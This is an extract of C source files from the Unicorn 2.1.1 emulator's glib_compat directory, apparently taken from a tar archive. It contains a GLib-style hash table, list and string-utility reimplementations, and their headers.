g_hash_table_destroy (GHashTable *hash_table) { if (hash_table == NULL) return; if (hash_table->ref_count == 0) return; g_hash_table_remove_all (hash_table); g_hash_table_unref (hash_table); } /** * g_hash_table_find: * @hash_table: a #GHashTable. * @predicate: function to test the key/value pairs for a certain property. * @user_data: user data to pass to the function. * * Calls the given function for key/value pairs in the #GHashTable until * @predicate returns %TRUE. The function is passed the key and value of * each pair, and the given @user_data parameter. The hash table may not * be modified while iterating over it (you can't add/remove items). * * Note, that hash tables are really only optimized for forward lookups, * i.e. g_hash_table_lookup(). * So code that frequently issues g_hash_table_find() or * g_hash_table_foreach() (e.g. in the order of once per every entry in a * hash table) should probably be reworked to use additional or different * data structures for reverse lookups (keep in mind that an O(n) find/foreach * operation issued for all n values in a hash table ends up needing O(n*n) * operations). * * Return value: The value of the first key/value pair is returned, for which * func evaluates to %TRUE. If no pair with the requested property is found, * %NULL is returned. * * Since: 2.4 **/ gpointer g_hash_table_find (GHashTable *hash_table, GHRFunc predicate, gpointer user_data) { gint i; if (hash_table == NULL) return NULL; if (predicate == NULL) return NULL; for (i = 0; i < hash_table->size; i++) { GHashNode *node = &hash_table->nodes [i]; if (node->key_hash > 1 && predicate (node->key, node->value, user_data)) return node->value; } return NULL; } /** * g_hash_table_foreach: * @hash_table: a #GHashTable. * @func: the function to call for each key/value pair. * @user_data: user data to pass to the function. * * Calls the given function for each of the key/value pairs in the * #GHashTable. The function is passed the key and value of each * pair, and the given @user_data parameter. The hash table may not * be modified while iterating over it (you can't add/remove * items). To remove all items matching a predicate, use * g_hash_table_foreach_remove(). 
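 *
 * For example (sketch):
 * |[<!-- language="C" -->
 * static void print_entry (gpointer key, gpointer value, gpointer user_data)
 * {
 *     printf ("%s = %p\n", (const char *) key, value);
 * }
 *
 * g_hash_table_foreach (table, print_entry, NULL);
 * ]|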
* * See g_hash_table_find() for performance caveats for linear * order searches in contrast to g_hash_table_lookup(). **/ void g_hash_table_foreach (GHashTable *hash_table, GHFunc func, gpointer user_data) { gint i; if (hash_table == NULL) return; if (func == NULL) return; for (i = 0; i < hash_table->size; i++) { GHashNode *node = &hash_table->nodes [i]; if (node->key_hash > 1) (* func) (node->key, node->value, user_data); } } /* * g_hash_table_lookup_node_for_insertion: * @hash_table: our #GHashTable * @key: the key to lookup against * @hash_return: key hash return location * Return value: index of the described #GHashNode * * Performs a lookup in the hash table, preserving extra information * usually needed for insertion. * * This function first computes the hash value of the key using the * user's hash function. * * If an entry in the table matching @key is found then this function * returns the index of that entry in the table, and if not, the * index of an unused node (empty or tombstone) where the key can be * inserted. * * The computed hash value is returned in the variable pointed to * by @hash_return. This is to save insertions from having to compute * the hash record again for the new record. */ static inline guint g_hash_table_lookup_node_for_insertion (GHashTable *hash_table, gconstpointer key, guint *hash_return) { GHashNode *node; guint node_index; guint hash_value; guint first_tombstone = 0; gboolean have_tombstone = FALSE; guint step = 0; /* Empty buckets have hash_value set to 0, and for tombstones, it's 1. * We need to make sure our hash value is not one of these. */ hash_value = (* hash_table->hash_func) (key); if (hash_value <= 1) hash_value = 2; *hash_return = hash_value; node_index = hash_value % hash_table->mod; node = &hash_table->nodes [node_index]; while (node->key_hash) { /* We first check if our full hash values * are equal so we can avoid calling the full-blown * key equality function in most cases. */ if (node->key_hash == hash_value) { if (hash_table->key_equal_func) { if (hash_table->key_equal_func (node->key, key)) return node_index; } else if (node->key == key) { return node_index; } } else if (node->key_hash == 1 && !have_tombstone) { first_tombstone = node_index; have_tombstone = TRUE; } step++; node_index += step; node_index &= hash_table->mask; node = &hash_table->nodes [node_index]; } if (have_tombstone) return first_tombstone; return node_index; } /* Each table size has an associated prime modulo (the first prime * lower than the table size) used to find the initial bucket. Probing * then works modulo 2^n. The prime modulo is necessary to get a * good distribution with poor hash functions. 
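 * Concretely, the initial bucket is hash % prime_mod[shift]; collisions
 * are then probed with an increasing step, masked to the 2^shift table
 * size (see g_hash_table_lookup_node()).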
*/ static const gint prime_mod [] = { 1, /* For 1 << 0 */ 2, 3, 7, 13, 31, 61, 127, 251, 509, 1021, 2039, 4093, 8191, 16381, 32749, 65521, /* For 1 << 16 */ 131071, 262139, 524287, 1048573, 2097143, 4194301, 8388593, 16777213, 33554393, 67108859, 134217689, 268435399, 536870909, 1073741789, 2147483647 /* For 1 << 31 */ }; static void g_hash_table_set_shift (GHashTable *hash_table, gint shift) { gint i; guint mask = 0; hash_table->size = 1 << shift; hash_table->mod = prime_mod [shift]; for (i = 0; i < shift; i++) { mask <<= 1; mask |= 1; } hash_table->mask = mask; } static gint g_hash_table_find_closest_shift (gint n) { gint i; for (i = 0; n; i++) n >>= 1; return i; } static void g_hash_table_set_shift_from_size (GHashTable *hash_table, gint size) { gint shift; shift = g_hash_table_find_closest_shift (size); shift = MAX (shift, HASH_TABLE_MIN_SHIFT); g_hash_table_set_shift (hash_table, shift); } /* * g_hash_table_resize: * @hash_table: our #GHashTable * * Resizes the hash table to the optimal size based on the number of * nodes currently held. If you call this function then a resize will * occur, even if one does not need to occur. Use * g_hash_table_maybe_resize() instead. * * This function may "resize" the hash table to its current size, with * the side effect of cleaning up tombstones and otherwise optimizing * the probe sequences. */ static void g_hash_table_resize (GHashTable *hash_table) { GHashNode *new_nodes; gint old_size; gint i; old_size = hash_table->size; g_hash_table_set_shift_from_size (hash_table, hash_table->nnodes * 2); new_nodes = g_new0 (GHashNode, hash_table->size); for (i = 0; i < old_size; i++) { GHashNode *node = &hash_table->nodes [i]; GHashNode *new_node; guint hash_val; guint step = 0; if (node->key_hash <= 1) continue; hash_val = node->key_hash % hash_table->mod; new_node = &new_nodes [hash_val]; while (new_node->key_hash) { step++; hash_val += step; hash_val &= hash_table->mask; new_node = &new_nodes [hash_val]; } *new_node = *node; } g_free (hash_table->nodes); hash_table->nodes = new_nodes; hash_table->noccupied = hash_table->nnodes; } /* * g_hash_table_maybe_resize: * @hash_table: our #GHashTable * * Resizes the hash table, if needed. * * Essentially, calls g_hash_table_resize() if the table has strayed * too far from its ideal size for its number of nodes. */ static inline void g_hash_table_maybe_resize (GHashTable *hash_table) { gint noccupied = hash_table->noccupied; gint size = hash_table->size; if ((size > hash_table->nnodes * 4 && size > 1 << HASH_TABLE_MIN_SHIFT) || (size <= noccupied + (noccupied / 16))) g_hash_table_resize (hash_table); } /* * g_hash_table_insert_internal: * @hash_table: our #GHashTable * @key: the key to insert * @value: the value to insert * @keep_new_key: if %TRUE and this key already exists in the table * then call the destroy notify function on the old key. If %FALSE * then call the destroy notify function on the new key. * * Implements the common logic for the g_hash_table_insert() and * g_hash_table_replace() functions. * * Do a lookup of @key. If it is found, replace it with the new * @value (and perhaps the new @key). If it is not found, create a * new node. 
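 *
 * In short: g_hash_table_insert() passes @keep_new_key = %FALSE (an
 * existing key is kept and the caller's @key is destroyed), while
 * g_hash_table_replace() passes %TRUE (the old key is destroyed and the
 * new @key is stored).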
*/ static void g_hash_table_insert_internal (GHashTable *hash_table, gpointer key, gpointer value, gboolean keep_new_key) { GHashNode *node; guint node_index; guint key_hash; guint old_hash; if (hash_table == NULL) return; if (hash_table->ref_count == 0) return; node_index = g_hash_table_lookup_node_for_insertion (hash_table, key, &key_hash); node = &hash_table->nodes [node_index]; old_hash = node->key_hash; if (old_hash > 1) { if (keep_new_key) { if (hash_table->key_destroy_func) hash_table->key_destroy_func (node->key); node->key = key; } else { if (hash_table->key_destroy_func) hash_table->key_destroy_func (key); } if (hash_table->value_destroy_func) hash_table->value_destroy_func (node->value); node->value = value; } else { node->key = key; node->value = value; node->key_hash = key_hash; hash_table->nnodes++; if (old_hash == 0) { /* We replaced an empty node, and not a tombstone */ hash_table->noccupied++; g_hash_table_maybe_resize (hash_table); } } } void g_hash_table_replace (GHashTable *hash_table, gpointer key, gpointer value) { g_hash_table_insert_internal (hash_table, key, value, TRUE); } /** * g_hash_table_insert: * @hash_table: a #GHashTable. * @key: a key to insert. * @value: the value to associate with the key. * * Inserts a new key and value into a #GHashTable. * * If the key already exists in the #GHashTable its current value is replaced * with the new value. If you supplied a @value_destroy_func when creating the * #GHashTable, the old value is freed using that function. If you supplied * a @key_destroy_func when creating the #GHashTable, the passed key is freed * using that function. **/ gboolean g_hash_table_insert (GHashTable *hash_table, gpointer key, gpointer value) { g_hash_table_insert_internal (hash_table, key, value, FALSE); return true; } /* * g_hash_table_lookup_node: * @hash_table: our #GHashTable * @key: the key to lookup against * @hash_return: optional key hash return location * Return value: index of the described #GHashNode * * Performs a lookup in the hash table. Virtually all hash operations * will use this function internally. * * This function first computes the hash value of the key using the * user's hash function. * * If an entry in the table matching @key is found then this function * returns the index of that entry in the table, and if not, the * index of an empty node (never a tombstone). */ static inline guint g_hash_table_lookup_node (GHashTable *hash_table, gconstpointer key) { GHashNode *node; guint node_index; guint hash_value; guint step = 0; /* Empty buckets have hash_value set to 0, and for tombstones, it's 1. * We need to make sure our hash value is not one of these. */ hash_value = (* hash_table->hash_func) (key); if (hash_value <= 1) hash_value = 2; node_index = hash_value % hash_table->mod; node = &hash_table->nodes [node_index]; while (node->key_hash) { /* We first check if our full hash values * are equal so we can avoid calling the full-blown * key equality function in most cases. */ if (node->key_hash == hash_value) { if (hash_table->key_equal_func) { if (hash_table->key_equal_func (node->key, key)) break; } else if (node->key == key) { break; } } step++; node_index += step; node_index &= hash_table->mask; node = &hash_table->nodes [node_index]; } return node_index; } /** * g_hash_table_lookup: * @hash_table: a #GHashTable. * @key: the key to look up. * * Looks up a key in a #GHashTable. Note that this function cannot * distinguish between a key that is not present and one which is present * and has the value %NULL. 
If you need this distinction, use * g_hash_table_lookup_extended(). * * Return value: the associated value, or %NULL if the key is not found. **/ gpointer g_hash_table_lookup (GHashTable *hash_table, gconstpointer key) { GHashNode *node; guint node_index; if (hash_table == NULL) return NULL; node_index = g_hash_table_lookup_node (hash_table, key); node = &hash_table->nodes [node_index]; return node->key_hash ? node->value : NULL; } /** * g_hash_table_new: * @hash_func: a function to create a hash value from a key. * Hash values are used to determine where keys are stored within the * #GHashTable data structure. The g_direct_hash(), g_int_hash(), * g_int64_hash(), g_double_hash() and g_str_hash() functions are provided * for some common types of keys. * If hash_func is %NULL, g_direct_hash() is used. * @key_equal_func: a function to check two keys for equality. This is * used when looking up keys in the #GHashTable. The g_direct_equal(), * g_int_equal(), g_int64_equal(), g_double_equal() and g_str_equal() * functions are provided for the most common types of keys. * If @key_equal_func is %NULL, keys are compared directly in a similar * fashion to g_direct_equal(), but without the overhead of a function call. * * Creates a new #GHashTable with a reference count of 1. * * Return value: a new #GHashTable. **/ GHashTable *g_hash_table_new(GHashFunc hash_func, GEqualFunc key_equal_func) { return g_hash_table_new_full(hash_func, key_equal_func, NULL, NULL); } /** * g_hash_table_new_full: * @hash_func: a function to create a hash value from a key. * @key_equal_func: a function to check two keys for equality. * @key_destroy_func: a function to free the memory allocated for the key * used when removing the entry from the #GHashTable or %NULL if you * don't want to supply such a function. * @value_destroy_func: a function to free the memory allocated for the * value used when removing the entry from the #GHashTable or %NULL if * you don't want to supply such a function. * * Creates a new #GHashTable like g_hash_table_new() with a reference count * of 1 and allows to specify functions to free the memory allocated for the * key and value that get called when removing the entry from the #GHashTable. * * Return value: a new #GHashTable. **/ GHashTable* g_hash_table_new_full (GHashFunc hash_func, GEqualFunc key_equal_func, GDestroyNotify key_destroy_func, GDestroyNotify value_destroy_func) { GHashTable *hash_table; hash_table = (GHashTable*)g_malloc(sizeof(GHashTable)); //hash_table = g_slice_new (GHashTable); g_hash_table_set_shift (hash_table, HASH_TABLE_MIN_SHIFT); hash_table->nnodes = 0; hash_table->noccupied = 0; hash_table->hash_func = hash_func ? hash_func : g_direct_hash; hash_table->key_equal_func = key_equal_func; hash_table->ref_count = 1; hash_table->key_destroy_func = key_destroy_func; hash_table->value_destroy_func = value_destroy_func; hash_table->nodes = g_new0 (GHashNode, hash_table->size); return hash_table; } /* * g_hash_table_remove_all_nodes: * @hash_table: our #GHashTable * @notify: %TRUE if the destroy notify handlers are to be called * * Removes all nodes from the table. Since this may be a precursor to * freeing the table entirely, no resize is performed. * * If @notify is %TRUE then the destroy notify functions are called * for the key and value of the hash node. 
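 * For instance (illustrative only), for a table created as
 * |[
 * GHashTable *t = g_hash_table_new_full (g_str_hash, g_str_equal,
 *                                        g_free, g_free);
 * ]|
 * passing %TRUE here hands every stored key and value back to g_free().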
*/ static void g_hash_table_remove_all_nodes (GHashTable *hash_table, gboolean notify) { int i; for (i = 0; i < hash_table->size; i++) { GHashNode *node = &hash_table->nodes [i]; if (node->key_hash > 1) { if (notify && hash_table->key_destroy_func) hash_table->key_destroy_func (node->key); if (notify && hash_table->value_destroy_func) hash_table->value_destroy_func (node->value); } } /* We need to set node->key_hash = 0 for all nodes - might as well be GC * friendly and clear everything */ memset (hash_table->nodes, 0, hash_table->size * sizeof (GHashNode)); hash_table->nnodes = 0; hash_table->noccupied = 0; } /** * g_hash_table_remove_all: * @hash_table: a #GHashTable * * Removes all keys and their associated values from a #GHashTable. * * If the #GHashTable was created using g_hash_table_new_full(), the keys * and values are freed using the supplied destroy functions, otherwise you * have to make sure that any dynamically allocated values are freed * yourself. * * Since: 2.12 **/ void g_hash_table_remove_all (GHashTable *hash_table) { if (hash_table == NULL) return; g_hash_table_remove_all_nodes (hash_table, TRUE); g_hash_table_maybe_resize (hash_table); } /* * g_hash_table_remove_node: * @hash_table: our #GHashTable * @node: pointer to node to remove * @notify: %TRUE if the destroy notify handlers are to be called * * Removes a node from the hash table and updates the node count. * The node is replaced by a tombstone. No table resize is performed. * * If @notify is %TRUE then the destroy notify functions are called * for the key and value of the hash node. */ static void g_hash_table_remove_node (GHashTable *hash_table, GHashNode *node, gboolean notify) { if (notify && hash_table->key_destroy_func) hash_table->key_destroy_func (node->key); if (notify && hash_table->value_destroy_func) hash_table->value_destroy_func (node->value); /* Erect tombstone */ node->key_hash = 1; /* Be GC friendly */ node->key = NULL; node->value = NULL; hash_table->nnodes--; } /* * g_hash_table_remove_internal: * @hash_table: our #GHashTable * @key: the key to remove * @notify: %TRUE if the destroy notify handlers are to be called * Return value: %TRUE if a node was found and removed, else %FALSE * * Implements the common logic for the g_hash_table_remove() and * g_hash_table_steal() functions. * * Do a lookup of @key and remove it if it is found, calling the * destroy notify handlers only if @notify is %TRUE. */ static gboolean g_hash_table_remove_internal (GHashTable *hash_table, gconstpointer key, gboolean notify) { GHashNode *node; guint node_index; if (hash_table == NULL) return FALSE; node_index = g_hash_table_lookup_node (hash_table, key); node = &hash_table->nodes [node_index]; /* g_hash_table_lookup_node() never returns a tombstone, so this is safe */ if (!node->key_hash) return FALSE; g_hash_table_remove_node (hash_table, node, notify); g_hash_table_maybe_resize (hash_table); return TRUE; } /** * g_hash_table_remove: * @hash_table: a #GHashTable. * @key: the key to remove. * * Removes a key and its associated value from a #GHashTable. * * If the #GHashTable was created using g_hash_table_new_full(), the * key and value are freed using the supplied destroy functions, otherwise * you have to make sure that any dynamically allocated values are freed * yourself. * * Return value: %TRUE if the key was found and removed from the #GHashTable. 
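 * A minimal sketch (illustrative only; @table as in the examples above):
 * |[
 * gboolean removed = g_hash_table_remove (table, "key");
 * // TRUE only if "key" was present; its destroy notifiers have run
 * ]|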
 **/
gboolean g_hash_table_remove (GHashTable *hash_table, gconstpointer key)
{
    return g_hash_table_remove_internal (hash_table, key, TRUE);
}

/**
 * g_hash_table_unref:
 * @hash_table: a valid #GHashTable.
 *
 * Decrements the reference count of @hash_table by one.
 * If the reference count drops to 0, all keys and values will be
 * destroyed, and all memory allocated by the hash table is released.
 * Unlike the GLib original, this compatibility version does not use
 * atomic operations, so it is not MT-safe and must not be called on
 * the same table from multiple threads at once.
 *
 * Since: 2.10
 **/
void g_hash_table_unref (GHashTable *hash_table)
{
    if (hash_table == NULL) return;
    if (hash_table->ref_count == 0) return;
    hash_table->ref_count--;
    if (hash_table->ref_count == 0) {
        g_hash_table_remove_all_nodes (hash_table, TRUE);
        g_free (hash_table->nodes);
        g_free (hash_table);
    }
}

/**
 * g_hash_table_ref:
 * @hash_table: a valid #GHashTable.
 *
 * Increments the reference count of @hash_table by one. Like
 * g_hash_table_unref(), this compatibility version is not atomic and
 * therefore not MT-safe.
 *
 * Return value: the passed in #GHashTable.
 *
 * Since: 2.10
 **/
GHashTable *g_hash_table_ref (GHashTable *hash_table)
{
    if (hash_table == NULL) return NULL;
    if (hash_table->ref_count == 0) return hash_table;
    //g_atomic_int_add (&hash_table->ref_count, 1);
    hash_table->ref_count++;
    return hash_table;
}

guint g_hash_table_size(GHashTable *hash_table)
{
    if (hash_table == NULL) return 0;
    return hash_table->nnodes;
}
/* END of g_hash_table related functions */

#if 0
/* general g_XXX substitutes */

void g_free(gpointer ptr)
{
    free(ptr);
}

gpointer g_malloc(size_t size)
{
    void *res;
    if (size == 0) return NULL;
    res = malloc(size);
    if (res == NULL) exit(1);
    return res;
}

gpointer g_malloc0(size_t size)
{
    void *res;
    if (size == 0) return NULL;
    res = calloc(size, 1);
    if (res == NULL) exit(1);
    return res;
}

gpointer g_try_malloc0(size_t size)
{
    if (size == 0) return NULL;
    return calloc(size, 1);
}

gpointer g_realloc(gpointer ptr, size_t size)
{
    void *res;
    if (size == 0) {
        free(ptr);
        return NULL;
    }
    res = realloc(ptr, size);
    if (res == NULL) exit(1);
    return res;
}
#endif

char *g_strdup(const char *str)
{
#ifdef _MSC_VER
    return str ? _strdup(str) : NULL;
#else
    return str ? strdup(str) : NULL;
#endif
}

char *g_strdup_printf(const char *format, ...)
{
    va_list ap;
    char *res;
    va_start(ap, format);
    res = g_strdup_vprintf(format, ap);
    va_end(ap);
    return res;
}

char *g_strdup_vprintf(const char *format, va_list ap)
{
    char *str_res = NULL;
#ifdef _MSC_VER
    int len = _vscprintf(format, ap);
    if (len < 0)
        return NULL;
    str_res = (char *)malloc(len + 1);
    if (str_res == NULL)
        return NULL;
    vsnprintf(str_res, len + 1, format, ap);
#else
    int ret = vasprintf(&str_res, format, ap);
    if (ret == -1) {
        return NULL;
    }
#endif
    return str_res;
}

char *g_strndup(const char *str, size_t n)
{
    /* try to mimic glib's g_strndup: a NULL @str yields NULL */
    char *res;
    if (str == NULL)
        return NULL;
    res = calloc(n + 1, 1);
    if (res == NULL)
        return NULL;
    strncpy(res, str, n);
    return res;
}

void g_strfreev(char **str_array)
{
    char **p = str_array;
    if (p) {
        while (*p) {
            free(*p++);
        }
    }
    free(str_array);
}

gpointer g_memdup(gconstpointer mem, size_t byte_size)
{
    if (mem) {
        void *res = g_malloc(byte_size);
        memcpy(res, mem, byte_size);
        return res;
    }
    return NULL;
}

gpointer g_new_(size_t sz, size_t n_structs)
{
    size_t need = sz * n_structs;
    if ((need / sz) != n_structs) return NULL;
    return g_malloc(need);
}

gpointer g_new0_(size_t sz, size_t n_structs)
{
    size_t need = sz * n_structs;
    if ((need / sz) != n_structs) return NULL;
    return g_malloc0(need);
}

gpointer g_renew_(size_t sz, gpointer mem, size_t n_structs)
{
    size_t need = sz * n_structs;
    if ((need / sz) != n_structs) return NULL;
    return g_realloc(mem, need);
}

/**
 * g_strconcat:
 * @string1: the first string to add, which must not be %NULL
 * @Varargs: a %NULL-terminated list of strings to append to the string
 *
 * Concatenates all of the given strings into one long string.
 * The returned string should be freed with g_free() when no longer needed.
 *
 * Note that this function is usually not the right function to use to
 * assemble a translated message from pieces, since proper translation
 * often requires the pieces to be reordered.
 *
 * <warning><para>The variable argument list <emphasis>must</emphasis> end
 * with %NULL. If you forget the %NULL, g_strconcat() will start appending
 * random memory junk to your string.</para></warning>
 *
 * Returns: a newly-allocated string containing all the string arguments
 */
gchar* g_strconcat (const gchar *string1, ...)
{
    va_list ap;
    char *res;
    size_t sz = strlen(string1);
    va_start(ap, string1);
    while (1) {
        char *arg = va_arg(ap, char*);
        if (arg == NULL) break;
        sz += strlen(arg);
    }
    va_end(ap);
    res = g_malloc(sz + 1);
    strcpy(res, string1);
    va_start(ap, string1);
    while (1) {
        char *arg = va_arg(ap, char*);
        if (arg == NULL) break;
        strcat(res, arg);
    }
    va_end(ap);
    return res;
}

/**
 * g_strsplit:
 * @string: a string to split.
 * @delimiter: a string which specifies the places at which to split the string.
 *     The delimiter is not included in any of the resulting strings, unless
 *     @max_tokens is reached.
 * @max_tokens: the maximum number of pieces to split @string into. If this is
 *     less than 1, the string is split completely.
 *
 * Splits a string into a maximum of @max_tokens pieces, using the given
 * @delimiter. If @max_tokens is reached, the remainder of @string is appended
 * to the last token.
 *
 * As a special case, the result of splitting the empty string "" is an empty
 * vector, not a vector containing a single string. The reason for this
 * special case is that being able to represent an empty vector is typically
 * more useful than consistent handling of empty elements. If you do need
 * to represent empty elements, you'll need to check for the empty string
 * before calling g_strsplit().
 *
 * Return value: a newly-allocated %NULL-terminated array of strings. Use
 * g_strfreev() to free it.
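 *
 * A short sketch of the rules above (illustrative only):
 * |[
 * gchar **v = g_strsplit ("a,b,,c", ",", -1); // {"a", "b", "", "c", NULL}
 * gchar **w = g_strsplit ("a,b,,c", ",", 2);  // {"a", "b,,c", NULL}
 * g_strfreev (v);
 * g_strfreev (w);
 * ]|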
 **/
gchar** g_strsplit (const gchar *string,
                    const gchar *delimiter,
                    gint max_tokens)
{
    GSList *string_list = NULL, *slist;
    gchar **str_array, *s;
    guint n = 0;
    const gchar *remainder;

    if (string == NULL) return NULL;
    if (delimiter == NULL) return NULL;
    if (delimiter[0] == '\0') return NULL;

    if (max_tokens < 1)
        max_tokens = G_MAXINT;

    remainder = string;
    s = strstr (remainder, delimiter);
    if (s) {
        gsize delimiter_len = strlen (delimiter);

        while (--max_tokens && s) {
            gsize len;

            len = s - remainder;
            string_list = g_slist_prepend (string_list,
                                           g_strndup (remainder, len));
            n++;
            remainder = s + delimiter_len;
            s = strstr (remainder, delimiter);
        }
    }
    if (*string) {
        n++;
        string_list = g_slist_prepend (string_list, g_strdup (remainder));
    }

    str_array = g_new (gchar*, n + 1);

    str_array[n--] = NULL;
    for (slist = string_list; slist; slist = slist->next)
        str_array[n--] = slist->data;

    g_slist_free (string_list);

    return str_array;
}

GSList *g_slist_find_custom (GSList *list, gconstpointer data,
                             GCompareFunc func)
{
    if (!func) return NULL;

    while (list) {
        if (func (list->data, data) == 0)
            return list;
        list = list->next;
    }

    return NULL;
}

int g_strcmp0 (const char *str1, const char *str2)
{
    /* Match GLib's documented contract: %NULL compares equal only to
     * %NULL, and sorts before any non-%NULL string. */
    if (!str1 && !str2) return 0;
    if (!str1) return -1;
    if (!str2) return 1;
    return strcmp(str1, str2);
}
unicorn-2.1.1/glib_compat/glib_compat.h 0000664 0000000 0000000 00000006237 14675241067 0020125 0 ustar 00root root 0000000 0000000
/* glib_compat.h

   replacement functionality for glib code used in qemu
   Copyright (C) 2016 Chris Eagle cseagle at gmail dot com

   This program is free software; you can redistribute it and/or modify it
   under the terms of the GNU General Public License as published by the
   Free Software Foundation; either version 2 of the License, or (at your
   option) any later version.

   This program is distributed in the hope that it will be useful, but
   WITHOUT ANY WARRANTY; without even the implied warranty of
   MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
   General Public License for more details.

   You should have received a copy of the GNU General Public License along
   with this program; if not, write to the Free Software Foundation, Inc.,
   51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
*/ #ifndef __GLIB_COMPAT_H #define __GLIB_COMPAT_H #include "unicorn/platform.h" #include <stdarg.h> #include <stdlib.h> #include <assert.h> #define G_MAXUINT UINT_MAX #define G_MAXINT INT_MAX #include "gtestutils.h" #include "gtypes.h" #include "garray.h" #include "gtree.h" #include "ghash.h" #include "gmem.h" #include "gslice.h" #include "gmessages.h" #include "gpattern.h" #include "grand.h" #include "glist.h" #include "gnode.h" typedef gint (*GCompareDataFunc)(gconstpointer a, gconstpointer b, gpointer user_data); typedef void (*GFunc)(gpointer data, gpointer user_data); typedef gint (*GCompareFunc)(gconstpointer v1, gconstpointer v2); guint g_str_hash(gconstpointer v); gboolean g_str_equal(gconstpointer v1, gconstpointer v2); guint g_int_hash(gconstpointer v); gboolean g_int_equal(gconstpointer v1, gconstpointer v2); int g_strcmp0(const char *str1, const char *str2); GList *g_list_first(GList *list); void g_list_foreach(GList *list, GFunc func, gpointer user_data); void g_list_free(GList *list); GList *g_list_insert_sorted(GList *list, gpointer data, GCompareFunc compare); #define g_list_next(list) (list->next) GList *g_list_prepend(GList *list, gpointer data); GList *g_list_remove_link(GList *list, GList *llink); GList *g_list_sort(GList *list, GCompareFunc compare); typedef struct _GSList { gpointer data; struct _GSList *next; } GSList; GSList *g_slist_append(GSList *list, gpointer data); void g_slist_foreach(GSList *list, GFunc func, gpointer user_data); void g_slist_free(GSList *list); GSList *g_slist_prepend(GSList *list, gpointer data); GSList *g_slist_sort(GSList *list, GCompareFunc compare); GSList *g_slist_find_custom(GSList *list, gconstpointer data, GCompareFunc func); /* replacement for g_malloc dependency */ void g_free(gpointer ptr); gpointer g_realloc(gpointer ptr, size_t size); char *g_strdup(const char *str); char *g_strdup_printf(const char *format, ...); char *g_strdup_vprintf(const char *format, va_list ap); char *g_strndup(const char *str, size_t n); void g_strfreev(char **v); gpointer g_memdup(gconstpointer mem, size_t byte_size); gpointer g_new_(size_t sz, size_t n_structs); gpointer g_new0_(size_t sz, size_t n_structs); gpointer g_renew_(size_t sz, gpointer mem, size_t n_structs); gchar** g_strsplit (const gchar *string, const gchar *delimiter, gint max_tokens); #endif �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/glib_compat/glist.c�������������������������������������������������������������������0000664�0000000�0000000�00000010017�14675241067�0016751�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* GLIB - Library of useful routines for C programming * Copyright (C) 1995-1997 Peter Mattis, Spencer Kimball and Josh MacDonald * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2.1 of the License, 
or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ /* * Modified by the GLib Team and others 1997-2000. See the AUTHORS * file for a list of people on the GLib Team. See the ChangeLog * files for a list of changes. These files are distributed with * GLib at ftp://ftp.gtk.org/pub/gtk/. */ /* * MT safe */ #include "gtypes.h" #include "glist.h" #include "gslice.h" #include "gmessages.h" #define _g_list_alloc() g_slice_new (GList) #define _g_list_alloc0() g_slice_new0 (GList) #define _g_list_free1(list) g_slice_free (GList, list) /** * g_list_alloc: * * Allocates space for one #GList element. It is called by * g_list_append(), g_list_prepend(), g_list_insert() and * g_list_insert_sorted() and so is rarely used on its own. * * Returns: a pointer to the newly-allocated #GList element **/ GList *g_list_alloc (void) { return _g_list_alloc0 (); } static inline GList *_g_list_remove_link (GList *list, GList *link) { if (link == NULL) return list; if (link->prev) { if (link->prev->next == link) link->prev->next = link->next; //else // g_warning ("corrupted double-linked list detected"); } if (link->next) { if (link->next->prev == link) link->next->prev = link->prev; //else // g_warning ("corrupted double-linked list detected"); } if (link == list) list = list->next; link->next = NULL; link->prev = NULL; return list; } /** * g_list_delete_link: * @list: a #GList, this must point to the top of the list * @link_: node to delete from @list * * Removes the node link_ from the list and frees it. * Compare this to g_list_remove_link() which removes the node * without freeing it. * * Returns: the (possibly changed) start of the #GList */ GList *g_list_delete_link (GList *list, GList *link_) { list = _g_list_remove_link (list, link_); _g_list_free1 (link_); return list; } /** * g_list_insert_before: * @list: a pointer to a #GList, this must point to the top of the list * @sibling: the list element before which the new element * is inserted or %NULL to insert at the end of the list * @data: the data for the new element * * Inserts a new element into the list before the given position. 
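 * For example (sketch only):
 * |[
 * GList *l = NULL;
 * l = g_list_insert_before (l, NULL, (gpointer) "b"); // append: ("b")
 * l = g_list_insert_before (l, l, (gpointer) "a");    // new head: ("a", "b")
 * ]|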
* * Returns: the (possibly changed) start of the #GList */ GList *g_list_insert_before (GList *list, GList *sibling, gpointer data) { if (list == NULL) { list = g_list_alloc (); list->data = data; g_return_val_if_fail (sibling == NULL, list); return list; } else if (sibling != NULL) { GList *node; node = _g_list_alloc (); node->data = data; node->prev = sibling->prev; node->next = sibling; sibling->prev = node; if (node->prev != NULL) { node->prev->next = node; return list; } else { g_return_val_if_fail (sibling == list, node); return node; } } else { GList *last; for (last = list; last->next != NULL; last = last->next) {} last->next = _g_list_alloc (); last->next->data = data; last->next->prev = last; last->next->next = NULL; return list; } } �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/glib_compat/glist.h�������������������������������������������������������������������0000664�0000000�0000000�00000002546�14675241067�0016766�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* GLIB - Library of useful routines for C programming * Copyright (C) 1995-1997 Peter Mattis, Spencer Kimball and Josh MacDonald * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2.1 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ /* * Modified by the GLib Team and others 1997-2000. See the AUTHORS * file for a list of people on the GLib 